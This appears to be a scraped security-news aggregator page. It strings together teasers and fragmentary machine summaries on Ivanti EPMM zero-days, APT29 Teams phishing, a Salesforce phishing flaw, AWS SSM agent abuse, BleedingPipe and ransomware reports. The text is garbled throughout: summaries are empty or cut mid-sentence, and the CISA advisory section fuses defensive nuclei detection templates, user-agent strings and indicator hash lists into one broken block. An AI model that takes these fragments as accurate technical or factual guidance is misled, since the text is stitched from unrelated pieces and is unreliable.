Serco"s client roster includes a long list of U.S. federal agencies, including the Departments of Homeland Security, Justice, and State, as well as U.S. Intelligence Agencies and multiple U.S. Armed Forces branches (e.g., Navy, Army, Marine Corps, Air Force). "Categories: Business Malwarebytes Ransomware Rollback rescues your data from encryption by effectively “turning back the clock” of a ransomware attack. But how does it work, exactly? |
The post FAQ: How does Malwarebytes ransomware rollback work? appeared first on Malwarebytes Labs.
"Autosummary:
Ransomware rollback preemptively backs up all file types including pictures, documents, JSON/XML configurations, EXEs, unless they are explicitly excluded, globally excluded, or exceed the maximum file size. For every file modified, e.g., documents, pictures, etc., space for a copy is required. Prevention alone, it seems, can only take us so far—so when ransomware hits, organizations need a way to emerge safely from the fallout, data intact. Try Ransomware Rollback Today To recap, Malwarebytes Ransomware Rollback is a last-resort recovery tool within Malwarebytes EDR, designed for swift recovery after other defense layers have been compromised. "Categories: Threat Intelligence Ransomware gangs are also starting to focus on exploiting zero-days for initial access. |
The post Global ransomware attacks at an all-time high, shows latest 2023 State of Ransomware report appeared first on Malwarebytes Labs.
"Autosummary:
A New Threat on the Horizon: CL0P For a year and a half, LockBit, which claims to have 100 affiliates, has been the most dominant form of “Ransomware-as-a-Service” (RaaS) in the US, averaging about 24 attacks per month. "Categories: Awareness Categories: News Tags: phishing Tags: amp Tags: url Tags: captcha Tags: redirection Researchers have found a new phishing tactic that uses Google Accelerated Mobile Pages (AMP) URLs to look trustworthy |
The post Phishing campaigns are using AMP URLs to avoid detection appeared first on Malwarebytes Labs.
"Autosummary:
Posted: August 3, 2023 by Researchers have found a new phishing tactic that uses Google Accelerated Mobile Pages (AMP) URLs to look trustworthy Researchers have found a new phishing tactic which uses Google Accelerated Mobile Pages (AMP) to make URLs look trustworthy.Phishing attacks often seem to come from people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Researchers discovered a bypass for a recently fixed actively exploited vulnerability in Ivanti Endpoint Manager Mobile (EPMM). Rapid7 cybersecurity researchers have discovered a bypass for the recently patched actively exploited vulnerability in Ivanti Endpoint Manager Mobile (EPMM). The new vulnerability, tracked as CVE-2023-35082 (CVSS score: 10.0), can be exploited by unauthenticated attackers to access the API in […]
The post Rapid7 found a bypass for the recently patched actively exploited Ivanti EPMM bug appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Ivanti EPMM) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Russia-linked APT29 group targeted dozens of organizations and government agencies worldwide with Microsoft Teams phishing attacks. Microsoft Threat Intelligence reported that Russia-linked cyberespionage group APT29 (aka SVR group, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes) carried out Microsoft Teams phishing attacks aimed at dozens of organizations and government agencies worldwide. APT29 along with APT28 cyber espionage group was involved in […]
The post Russian APT29 conducts phishing attacks through Microsoft Teams appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, APT29) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
"Technology is accelerating faster than it ever has before, giving IT and security teams more tools to fend off cybersecurity attacks from an increasingly diverse slate of bad actors, according to Comcast Business. Cybercriminals employ sophisticated tactics However, the tactics cybercriminals are using to access systems are also growing more sophisticated by the day. Access to armies of botnets and sprawling lists of customer data are just a few clicks away on the dark web. … More
The post 67% of data breaches start with a single click appeared first on Help Net Security.
"Autosummary:
“No organization has perfect security, but everyone needs to understand their cybersecurity risks and build a plan to address the threats and trends the industry is experiencing,” said Shena Seneca Tharnish, VP, Secure Networking and Cyber Security Solutions, Comcast Business. "Autosummary:
"Autosummary:
"ClearSale launched its new Brand Protection platform. Brand Protection by ClearSale uses AI and digital intelligence to continuously scan for and report brand impersonation attacks such as fake social profiles, ads, and websites; counterfeit products; and phishing attacks. “ClearSale has worked at the forefront of CNP fraud prevention for more than 20 years, helping many of the world’s most recognized brands prevent chargebacks and false declines,” said Rafael Lourenco, EVP and Partner at ClearSale. “With … More
The post ClearSale Brand Protection combats phishing, fake accounts, and counterfeit products appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"We found a unique way to abuse the SSM service, allowing it to function seamlessly as a fully integrated trojan infrastructure, making the agent in the endpoint to communicate with different AWS account (which can be used by the attacker) than the original AWS account," explains Mitiga "By executing commands from a separate, maliciously owned AWS account, the actions carried out by the SSM agent will remain hidden within the original AWS account, making the process of detecting the malicious activity cumbersome. "Autosummary:
The observed attack chain (Guardio Labs) Meta still investigating After confirming the issues by replicating the creation of a Salesforce-branded address capable of disseminating phishing emails, Guardio Labs notified the vendor of their discovery on June 28, 2023 Salesforce reproduced the vulnerability and resolved the problem exactly a month later, on July 28, 2023. "The Guardio research team discovered an email phishing campaign exploiting a zero-day vulnerability in Salesforce’s legitimate email services and SMTP servers. Phishing email sample as was sent from the “@salesforce.com” email address The vulnerability allowed threat actors to craft targeted phishing emails, evading conventional detection methods by leveraging Salesforce’s domain and reputation and exploiting legacy quirks in Facebook’s web games platform. 83% of organizations face phishing attacks every year, and mass-market emails are the most … More
The post Salesforce and Meta suffer phishing campaign that evades typical detection methods appeared first on Help Net Security.
"Autosummary:
"Mitiga researchers have documented a new post-exploitation technique attackers can use to gain persistent remote access to AWS Elastic Compute Cloud (EC2) instances (virtual servers), as well as to non-EC2 machines (e.g., on-premises enterprise servers and virtual machines, and VMs in other cloud environments). The success of this “living off the land” technique hinges on: Attackers gaining initial access to the machine (e.g., by exploiting an unpatched vulnerability on a public-facing instance/server), and The presence … More
The post Attackers can turn AWS SSM agents into remote access trojans appeared first on Help Net Security.
"Autosummary:
The success of this “living off the land” technique hinges on: Attackers gaining initial access to the machine (e.g., by exploiting an unpatched vulnerability on a public-facing instance/server), and The presence of the SSM Agent, a software component that enterprise sysadmins use to manage the endpoints from the AWS account using the AWS System Manager service “After controlling the SSM Agent, the attackers can carry out malicious activities, such as data theft, encrypting the filesystem (as a ransomware), misusing endpoint resources for cryptocurrency mining and attempting to propagate to other endpoints withing the network – all under the guise of using a legitimate software, the SSM Agent,” Mitiga researchers Ariel Szarf and Or Aspir explained. "Autosummary:
"While the group uses relatively common techniques to conduct attacks (such as the use of phishing and a historical reliance on open-source offensive security tools), its likely continued use of these methods, determined posture, and progressive evolution of tactics suggests the group remains formidable and capable," the company said. "Autosummary:
Some of the other notable findings are as follows - Mitsubishi Electric (20.5%), Siemens (18.2%), and Rockwell Automation (15.9%) were the most impacted vendors in the critical manufacturing sector Hitachi Energy (39.5%), Advantech (10.5%), Delta Electronics, and Rockwell Automation (both 7.9%) were the most impacted vendors in the energy sector Siemens emerged as the leading entity producing the most CVEs through the first half of 2023, accounting for 41 ICS advisories Use after free, out-of-bounds read, improper input validation, out-of-bounds write, and race condition were the top five software weaknesses "Autosummary:
"This triggers the verification flow that sends the email to this routing address, ending up as a new task in our system," the researchers said, adding it leads to a scenario where a salesforce.com email address can be verified simply by clicking on the link accompanying the request to add the actor-controlled address. "Autosummary:
"The organizations targeted in this activity likely indicate specific espionage objectives by Midnight Blizzard directed at government, non-government organizations (NGOs), IT services, technology, discrete manufacturing, and media sectors. "Autosummary:
Cybersecurity firm Rapid7, which discovered and reported the bug, provides indicators of compromise (IOCs) to help defenders detect signs of a CVE-2023-35082 attack and urges Ivanti customers to update MobileIron Core software to the latest version immediately. Similar Ivanti bugs exploited in attacks since April Two other security flaws in Ivanti"s Endpoint Manager Mobile (EPMM) (formerly MobileIron Core) have been exploited by state hackers since April, according to a CISA advisory published on Tuesday. "Categories: Personal Tags: Minecraft Tags: mod Tags: forge Tags: players Tags: vulnerability Tags: RCE Tags: bleedingpipe Tags: malware Minecraft players interested in modding are at risk from a remote code execution vulnerability targeting both players and servers. |
The post Minecraft fans beware: Players and servers at risk from BleedingPipe vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
From the Minecraft security (MMPA) article highlighting details of the attack: BleedingPipe is an exploit being used in the wild allowing FULL remote code execution on clients and servers running popular Minecraft mods on 1.7.10/1.12.2 Forge (other versions could also be affected), alongside some other mods.For players, the news isn’t particularly reassuring: As a player if you don’t play on servers, you are not affected. "Categories: Exploits and vulnerabilities Categories: News Tags: Ivanti Tags: EPMM Tags: MobileIron Tags: CVE-2023-35081 Tags: CVE-2023-35078 Tags: tomcat Tags: arbitrary file write Tags: ACL Tags: upgrade Ivanti has issued a patch to address a second critical zero-day vulnerability |
The post Ivanti patches second zero-day vulnerability being used in attacks appeared first on Malwarebytes Labs.
"Autosummary:
Posted: August 2, 2023 by Ivanti has issued a patch to address a second critical zero-day vulnerability Ivanti has issued a patch to address a second critical zero-day vulnerability that is under active attack. "The following cybersecurity agencies coauthored this joint Cybersecurity Advisory (CSA):
This advisory provides details on the Common Vulnerabilities and Exposures (CVEs) routinely and frequently exploited by malicious cyber actors in 2022 and the associated Common Weakness Enumeration(s) (CWE). In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems.
The authoring agencies strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce the risk of compromise by malicious cyber actors.
Autosummary:
PURPOSE This document was developed by CISA, NSA, FBI, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.CISA, FBI, NSA, ACSC, CCCS, NCSC-NZ, CERT NZ, and NCSC-UK do not endorse any commercial product or service, including any subjects of analysis.Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.Harden commonly exploited enterprise network services, including Link-Local Multicast Name Resolution (LLMNR) protocol, Remote Desktop Protocol (RDP), Common Internet File System (CIFS), Active Directory, and OpenLDAP.Strictly control the use of native scripting applications, such as command-line, PowerShell, WinRM, Windows Management Instrumentation (WMI), and Distributed Component Object Model (DCOM).While sophisticated actors also develop tools to exploit other vulnerabilities, developing exploits for critical, wide-spread, and publicly known vulnerabilities gives actors low-cost, high-impact tools they can use for several years. For more information on designing secure-by-design and -default products, including additional recommended secure-by-default configurations, see joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Security-by-Design and -Default. : Download the PDF version of this report: TECHNICAL DETAILS Key Findings In 2022, malicious cyber actors exploited older software vulnerabilities more frequently than recently disclosed vulnerabilities and targeted unpatched, internet-facing systems. , These vulnerabilities allow RCE, privilege escalation, and authentication bypass in VMware Workspace ONE Access, Identity Manager, and other VMware products. "Experts spotted a spear-phishing Facebook campaign exploiting a zero-day vulnerability in Salesforce email services. Researchers from Guardio Labs uncovered a sophisticated phishing campaign exploiting a zero-day vulnerability in Salesforce email services and SMTP servers. The phishing campaigns are able to evade conventional detection methods by chaining the Salesforce vulnerability and legacy quirks in Facebook’s web […]
The post Zero-day in Salesforce email services exploited in targeted Facebook phishing campaign appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Salesforce) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "US CISA added a second actively exploited Ivanti ‘s Endpoint Manager Mobile (EPMM) vulnerability to its Known Exploited Vulnerabilities catalog. US Cybersecurity and Infrastructure Security Agency (CISA) added the second actively exploited Ivanti ‘s Endpoint Manager Mobile (EPMM, formerly MobileIron Core) vulnerability, tracked as CVE-2023-35081, to its Known Exploited Vulnerabilities Catalog. “The Cybersecurity and Infrastructure Security […]
The post CISA adds second Ivanti EPMM flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
"With exponential growth in the number of human and machine actors on the network and more sophisticated technology in more places, identity in this new era is rapidly becoming a super-human problem, according to RSA. Paradoxically, even in this world where AI can dynamically assess risks and automate responses to threats, humans will have an even more important and strategic role in cybersecurity and identity security. The report found significant gaps in respondents’ knowledge concerning … More
The post The gap in users’ identity security knowledge gives cybercriminals an opening appeared first on Help Net Security.
"Autosummary:
“The RSA’s report reveals why identity is one of the most susceptible ways for cybercriminals to breach an organization—users simply don’t understand identity’s full cybersecurity role, the risks that identity poses, or the ways to use identity to build safer organizations,” said RSA CEO Rohit Ghai. "78% of Europe’s largest financial institutions experienced a third-party breach in the past year, according to SecurityScorecard. In the wake of attacks such as MOVEit and SolarWinds, cybersecurity regulations are increasing the need for comprehensive approaches to manage vendor risk and ensure compliance. 84% of financial institutions have been exposed to a fourth-party breach – illustrating how a vast web of unseen risks are hiding in plain sight. Visibility across the entire third-and fourth-party ecosystem … More
The post EU’s financial institutions face cyber resilience crisis appeared first on Help Net Security.
"Autosummary:
If nearly 20% of the most well-resourced financial entities in the EU have grades of C or worse, then it’s likely that the overall cyber resilience for other financial entities is actually much lower,” said Matthew McKenna, Chief Sales Officer, SecurityScorecard. "CyFox researchers have discovered a DLL planting/hijacking vulnerability in popular media center application Stremio, which could be exploited by attackers to execute code on the victim’s system, steal information, and more. About the vulnerability DLLs (dynamic link libraries) are files that can be dynamically linked and shared by multiple programs concurrently, and are crucial to Windows and many applications (including Stremio). “They house standard functions shared by various applications, preventing code duplication and reducing executable … More
The post Stremio vulnerability exposes millions to attack appeared first on Help Net Security.
"Autosummary:
Possible attacks Nir Yehoshua, Chief Researcher and Team Leader at CyFox, says that to exploit this DLL planting/hijacking vulnerability, an attacker has to first gain unauthorized access to the victim’s system so they can transfer the malicious DLL file to the software’s path and then wait for the user to run the vulnerable software. "Autosummary:
"In the Android ecosystem, n-day vulnerabilities are almost as dangerous as zero-days, according to Google’s review of zero-days exploited in the wild in 2022. N-days functioning as zero-days Zero-days are software bugs that are unknown to the vendor but known to – and exploited by – threat actors. They become n-days when their existence has been made public, with or without a patch being available. The problem is considerable in the Android ecosystem, since Google’s … More
The post Android n-day bugs pose zero-day threat appeared first on Help Net Security.
"Autosummary:
Attackers can use the known n-day bug, but have it operationally function as a 0-day since it will work on all affected devices,” noted Maddie Stone, Security Researcher at Google’s Threat Analysis Group (TAG). "After the release of a National Cybersecurity Strategy and its implementation plan, the Biden-Harris Administration has unveiled the National Cyber Workforce and Education Strategy (NCWES), “aimed at addressing both immediate and long-term cyber workforce needs.” The National Cyber Workforce and Education Strategy The ongoing cybersecurity skills shortage is a major threat to national, enterprise and consumer safety. “The NCWES emphasizes that no one actor can alone affect the needed change at scale. This means all … More
The post US government outlines National Cyber Workforce and Education Strategy appeared first on Help Net Security.
"Autosummary:
The NCWES aims to: Equip every American with foundational cyber skills – digital literacy, computational literacy, and digital resilience – by providing learning opportunities to all and promoting the pursuit of foundational cyber skills and cyber careers – digital literacy, computational literacy, and digital resilience – by providing learning opportunities to all and promoting the pursuit of foundational cyber skills and cyber careers Transform cyber education by building and leveraging ecosystems to improve cyber education, expanding competency-based cyber education, investing in educators, and making cyber education and training more affordable and accessible by building and leveraging ecosystems to improve cyber education, expanding competency-based cyber education, investing in educators, and making cyber education and training more affordable and accessible Expand and enhance the national cyber workforce by collaborating with a wide range of stakeholders, adoping a skills-based approach to recruitment and development, and increasing access to cyber jobs for all Americans by collaborating with a wide range of stakeholders, adoping a skills-based approach to recruitment and development, and increasing access to cyber jobs for all Americans Strengthen the federal cyber workforce by communicating the benefits of careers in public service amongst both job seekers and current employees and lower the barriers associated with hiring and onboarding “The NCWES envisions a skills-based digital future where workers have access to good-paying, middle-class cyber jobs within their communities,” the Administration noted. "Autosummary:
Delivered to victims via WhatsApp, the app houses identical features as that of SpyNote, requesting for accessibility permissions and others to collect call logs, contacts, files, location, SMS messages, as well as install additional apps and steal data from Facebook Messenger, imo, Signal, Telegram, Viber, and WhatsApp. "Autosummary:
FraudGPT promoted on hacker forum (SlashNext) Next-gen cybercrime chatbots An investigation from researchers at cybersecurity company SlashNext, reveals that CanadianKingpin12 is actively training new chatbots using unrestricted data sets sourced from the dark web or basing them on sophisticated large language models developed for fighting cybercrime. "Autosummary:
How to easily enable users to reset their own passwords Ideally, a ransomware event doesn’t occur in the first place, but implementing solutions through proactive planning will save the IT staff and users valuable time and resources if it does. The burden mass password resets place on IT teams As troublesome as a password reset account is for users, it’s helpdesk and IT staff who deal with the burden of hugely increased call volumes and service tickets. As is typical in ransomware attacks, the University of Waterloo forced staff, faculty, and employee grad students to reset their passwords by June 8th. "Mobb announced its AI-powered technology that automates vulnerability remediations to significantly reduce security backlogs and free developers to focus on innovation. Mobb ingests SAST results from various scanning tools and automatically fixes code, while keeping the developers informed during the process to instill trust and ensure accuracy. “We built technology that automatically fixes vulnerabilities in applications, in a way that is trusted by developers and security teams. All the steps and interactions are captured by … More
The post Mobb automates vulnerability remediations with AI-powered technology appeared first on Help Net Security.
"Autosummary:
"Cisco is enhancing its Extended Detection and Response (XDR) solution. By adding recovery to the response process, Cisco XDR is redefining what customers should expect from security products. This announcement brings near real-time recovery for business operations after a ransomware attack. Cisco continues to drive momentum towards its vision of the Cisco Security Cloud—a unified, AI-driven, cross-domain security platform. With the launch of Cisco XDR at the RSA Conference this year, Cisco delivered deep telemetry … More
The post Cisco adds automated ransomware recovery to its XDR solution appeared first on Help Net Security.
"Autosummary:
With the new capabilities in Cisco XDR, Security Operations Center (SOC) teams will be able to automatically detect, snapshot, and restore the business-critical data at the very first signs of a ransomware attack, often before it moves laterally through the network to reach high-value assets. "Autosummary:
Infection route for air-gapped systems (Kaspersky) In May 2022, Kaspersky noticed an additional implant used in the APT31 attacks, designed to collect local files from breached systems. "Autosummary:
Google AMP redirection to a phishing site (Cofense) Data from anti-phishing protection company Cofense shows that the volume of phishing attacks employing AMP spiked spiked significantly towards mid-July, suggesting that threat actors may be adopting the method. "Autosummary:
"The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.
Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.
CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.
Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.
This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt f "
Autosummary:
tags: ivanti, mobileiron, epmm, auth-bypass requests: - method: GET path: - "{{RootURL}}/mifs/aad/api/v2/ping" matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - "vspVersion" - "apiVersion" condition: and CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081: id: CVE-2023-35081 info: name: Ivanti EPMM Remote Arbitrary File Write author: JC severity: High reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-35081 description: Identifies vulnerable unpatched versions of Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10.0.3, 11.9.1.2, and 11.8.1.2 that allows an authenticated administrator to perform arbitrary file writes to the EPMM server.tags: ivanti, mobileiron, epmm requests: - method: GET path: - "{{RootURL}}/mifs/c/windows/api/v2/device/registration" matchers-condition: and matchers: - type: status status: - 200 - type: regex part: all regex: - ".*\?VSP(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0 NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx): Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) EVIDENCE OF VULNERABILITY METHODS CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-30578: id: CVE-2023-35078-Exposure info: name: Ivanti EPMM Remote Unauthenticated API Access author: JC severity: critical reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-35078 description:af06c3e72f2f307515ba549174d8e5a6 b311ab82b30f41b12cb9089d00c4a1ff b4f31423445b5f13675f205ac997f41f b50666c9aed1c2f222c56b6e9b326d27 b53f179b3f25f72bb0c7ccf45bf8beee b57f3e41c03803306b0ee2111f7ef823 b79434613820faf30d58f103c4415a29 b8366aaa5ed51c0dea3fc90ef7e14889 b8f6b0d234a305c25411e83fd430c624 b956ed2b848dabb4e79ab7358233861b b9ecb08402df0f1f6e1ce76b8ad6e91f ba4a616c8d4ab9358a82b321d8e618bf bcd62f3e029f96f62c24d50d2d1402ac bcf75736d176394f3df69f3e0ef7dd9f be1f24457141d80206bc2e58f55dc879 c013f308d170aa2eca4a5b0f0bbd3ccb c0a2fd066c955137036f92da2c3a3ff1 c17b3ec40ed5216e44311138aafaea2c c262a39f49604f05a5656213f758cd46 c66f36eb180438882133717c3abb5157 c986c7bf720ce1463c3d628d2b3dad01 c9c16287cbbe5a037244e374ba84aecc cbcd728a2350712b5747cd3447473deb cbeeb123efe8cf7f842426b673415c28 ccb15eef4287c8efa472915bcb4ec458 ccdddb69e9344a039c4ac9c49a6f2d7b cd1312be032256a10cf866af3e9afae9 ce0dd163d9e02bfd42d61024523cb134 ceef2e728db1b5ae15432f844eeb66e1 d12d98a0877f6e3c8b5a59f41cc4de9b d131f17689f1f585e9bfdcdb72a626bb d173076d97a0400a56c81089912b9218 d255291bb8e460626cb906ebacc670e5 d2cea317778ad6412c458a8a33b964fd d3cfee76468a9556fd9d017c1c8ee028 d3d72f4c7038f7313ad0570e16c293bf d485a1b5db2f97dc56500376d677aa89 d662d20507bebc37b99a4d413afa2752 d711d577b9943ab4e2f8a2e06bb963e3 d92e87d2689957765987e2be732d728e d966c6c822122e96f6e9f5f1d4778391 daee31d7cc6e08ead6afad2175989e1d dbb293176747fa1c2e03cbc09433f236 dc26ef761c7ec40591b1fe6e561b521d dc9e6edeb7557bc80be68be15cebb77a dddfbae77336120febd5ad690af3e341 e1f579227327ebb21cde3f9e7511db01 e3c642432a815a07f035e01308aaa8fc e54329351788661f2a8d4677a759fc42 e82b7ad2c05f4617efbc86a78c1e61e9 e99cffa2afa064625f09e1c5aca8f961 ea6bd3db104ca210b5ad947d46134aaf eb277d809a59d39d02605c0edd9333e9 ed82a50d98700179c8ae70429457477a ef35374f4146b3532f0902d6f7f0ef8c ef4c4d79f02ac404f47513d3a73e20c7 f05a5a60ad6f92d6f28fa4f13ded952f f0776dfe17867709fdb0e0183ed71698 f20fbfd508e24d50522eadf0186b03eb f3d751b0585855077b46dfce226cfea1 f4dd9bb28d680a3368136fb3755e7ea9 f804388f302af1f999e4664543c885a1 f8bcc8f99a3afde66d7f5afb5d8f1b43 f8d6f89aecf792e844e72015c9f27c95 f967460f8c6de1cedb180c90c98bfe98 f9d5cc0cbae77ea1a371131f62662b6b fa4f1a3b215888bc5f19b9f91ba37519 fdff2bf247a7dad40bac228853d5a661 fe6e7fac4f0b4f25d215e28ca8a22957 fe9de1cdd645971c5d15ee1873c3ff8d febba89b4b9a9649b3a3bf41c4c7d853 NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS): Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67 NCSC-NO observed the following user agents communicating with Exchange webshell: APPENDIX: INDICATORS OF COMPROMISE NCSC-NO observed the following webshell hash: c0b42bbd06d6e25dfe8faebd735944714b421388 NCSC-NO observed the following hash of mi.war : 1cd358d28b626b7a23b9fd4944e29077c265db46 NCSC-NO observed the following JA3 Hashes used against MobileIron Core: 2d5bd942ebf308df61e1572861d146f6 473cd7cb9faa642487833865d516e578 579ccef312d18482fc42e2b822ca2430 849d3331f3e07a0797a02f12a6a82aa9 8d9f7747675e24454cd9b7ed35c58707 ad55557b7cbd735c2627f7ebb3b3d493Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2] CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core.[T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and: Perform arbitrary Lightweight Directory Access Protocol (LDAP) queries against the Active Directory (AD). Overview In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network.SUMMARY The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. "Autosummary:
"Autosummary:
"A vulnerability management strategy that relies solely on CVSS for vulnerability prioritization is proving to be insufficient at best, according to Rezilion. In fact, relying solely on a CVSS severity score to assess the risk of individual vulnerabilities was shown to be equivalent to randomly selecting vulnerabilities for remediation. Additional context is required in order to allow for a more scalable and effective prioritization strategy. This context should stem from internal sources — aka the … More
The post Relying on CVSS alone is risky for vulnerability management appeared first on Help Net Security.
"Autosummary:
A patching strategy that considers CVSS, internal environment context (such as reachability analysis, asset criticality, and provenance), and additional threat intelligence sources such as CISA KEV combined with EPSS, can assist organizations in making informed, risk-based vulnerability management decisions and improve the overall security posture of their organization. "Most organizations lack strong cyber resilience strategies or data security capabilities to address threats and maintain business continuity, according to BigID. Despite both the rise in threats and the high percentage of respondents whose organizations suffered recent attacks, there hasn’t been a corresponding uptick in strategic measures to shore up cyber resilience. In fact, close to four in five survey respondents don’t have complete confidence that their company has a cyber resilience strategy designed to … More
The post The race against time in ransomware attacks appeared first on Help Net Security.
"Autosummary:
When an organization gets hit by ransomware, and data is stolen, wiped, infected, or otherwise compromised, that organization can’t properly function until its data, processes, operations, and applications are restored. "The most widely used method for ransomware delivery in 2022 was via URL or web browsing (75.5%), Palo Alto Networks researchers have found. In 2021, it was email attachments (i.e., delivery via SMTP, POP3, and IMAP protocols), but in 2022 that particular delivery channel was used only in 12% of attempts. Ransomware delivery vectors in 2022 (Source: Palo Alto Networks) “Ransomware binaries are often delivered from compromised websites, which should serve as a reminder for … More
The post Web browsing is the primary entry vector for ransomware infections appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The installer, besides activating the standard installation process, stealthily drops the Fruity trojan, a Python-based malware that unpacks an MP3 file ("Idea.mp3") to load an image file ("Fruit.png") to activate the multi-stage infection. "Autosummary:
" After further research, the MMPA has found that the BleedingPipe vulnerability is also present in the following Minecraft mods: EnderCore LogisticsPipes versions older than 0.10.0.71 BDLib 1.7 through 1.12 Smart Moving 1.12 Brazier DankNull Gadomancy Advent of Ascension (Nevermine) version 1.12.2 Astral Sorcery versions 1.9.1 and older EnderCore versions below 1.12.2-0.5.77 JourneyMap versions below 1.16.5-5.7.2 Minecraft Comes Alive (MCA) versions 1.5.2 through 1.6.4 RebornCore versions below 4.7.3 Thaumic Tinkerer versions below 2.3-138 However, it is essential to note that the above list isn"t complete, and BleedingPipe potentially impacts many more mods. "Another actively exploited zero-day vulnerability (CVE-2023-35081) affecting Ivanti Endpoint Manager Mobile (EPMM) has been identified and fixed. The first zero-day spotted Last week, we reported on a remote unauthenticated API access vulnerability (CVE-2023-35078) affecting Ivanti EPMM having been exploited to target Norwegian ministries. The company stated that the vulnerability has impacted a limited number of customers and has released a patch, but did not share any other details or indicators of compromise with the public. … More
The post Ivanti fixes second zero-day exploited by attackers (CVE-2023-35081) appeared first on Help Net Security.
"Autosummary:
About CVE-2023-35081 CVE-2023-35081, discovered with the help of Mnemonic researchers, is a remote arbitrary file write vulnerability that could allow a threat actor to remotely create, modify, or delete files in the Ivanti EPMM server. "Autosummary:
